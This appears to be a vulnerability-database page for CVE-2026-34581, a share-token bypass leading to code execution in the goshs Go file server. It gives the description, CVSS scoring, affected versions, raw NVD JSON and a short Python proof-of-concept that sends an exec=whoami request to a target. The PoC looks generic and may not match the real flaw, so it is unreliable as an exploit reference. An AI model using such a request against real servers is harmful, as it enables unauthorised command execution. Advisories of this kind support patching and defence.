Security Vulnerability Report
中文
CVE-2026-34581 CVSS 8.1 HIGH

CVE-2026-34581

Published: 2026-04-02 19:21:32
Last Modified: 2026-04-15 17:38:30
Source: [email protected]

Description

goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:* - VULNERABLE
cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:* - VULNERABLE
goshs 1.1.0
goshs 2.0.0-beta.2之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url, share_token): """ PoC for CVE-2026-34581 Demonstrates bypassing Share Token restrictions to achieve RCE. """ # Target endpoint using the share token # The exploit bypasses the file restriction to access exec features exploit_url = f"{target_url}/?token={share_token}&exec=whoami" try: response = requests.get(exploit_url) if response.status_code == 200: print("[+] Exploit successful! Command output:") print(response.text) else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8000" token = "VULNERABLE_TOKEN_ID" exploit(target, token)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34581", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:21:32.157", "lastModified": "2026-04-15T17:38:30.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "goshs is a SimpleHTTPServer written in Go. From version 1.1.0 to before version 2.0.0-beta.2, when using the Share Token it is possible to bypass the limited selected file download with all the gosh functionalities, including code exec. This issue has been patched in version 2.0.0-beta.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:goshs:goshs:*:*:*:*:*:go:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "2.0.0", "matchCriteriaId": "EE028980-59D0-49E3-81A8-BB9E32D3FC9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:goshs:goshs:2.0.0:beta1:*:*:*:go:*:*", "matchCriteriaId": "047ECFC3-056F-4FAC-9B64-5F7C120CFFE1"}]}]}], "references": [{"url": "https://github.com/patrickhener/goshs/commit/6fb224ed15c2ccc0c61a5ebe22f2401eb06e9216", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-jgfx-74g2-9r6g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.